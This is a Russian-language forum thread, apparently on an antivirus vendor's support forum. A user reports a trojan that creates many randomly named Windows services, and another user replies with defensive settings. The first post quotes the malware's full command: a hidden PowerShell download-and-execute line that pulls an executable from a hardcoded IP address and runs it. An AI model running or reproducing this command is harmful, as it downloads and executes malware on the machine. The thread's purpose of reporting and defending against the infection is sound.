Jump to content
AleckK

Есть ли информация по трояну? Создает службы ABvYIW-zzCyfQ

Recommended Posts

Есть ли информация по трояну? Не могу отследить откуда он срабатывает и какой механизм использует. В интернете никакой информации.

Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает.

В службах создаются со случайным наборов букв несколько десятков служб типа ABvYIW ..... zzCyfQ. В службе - выполнение скрипта powershell, в 2003 конечно же он не срабатывает из-за отсутствия powershell.

cmd /c powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX (New-Object Net.WebClient).DownloadFile('http://91.211.88.100/nw.exe','C:\Users\Public\nw.exe');Start-Process C:\Users\Public\nw.exe

Хотел сам скачать этот файл и его проверить антивирусом, но сайт не отвечает, файл недоступен. Понимаю, что в будущем ничто не мешает этому файлу появиться.

Share this post


Link to post
7 часов назад, AleckK сказал:

Пока замечено только на Windows 2003. Kaspersky Security 10.1 для Windows Server ничего не видит и не отлавливает.

Может, настроить Default Deny на всякий случай? И Log Inspection активировать - там есть эвристика слежения за событиями "В системе установлена служба".

А ещё неплохо бы в Exploit Prevention включить защиту процессов lsass.exe и svchost.exe - хотя бы на время предполагаемой атаки.

 

Share this post


Link to post

×
×
  • Create New...

Important Information

We use cookies to make your experience of our websites better. By using and further navigating this website you accept this. Detailed information about the use of cookies on this website is available by clicking on more information.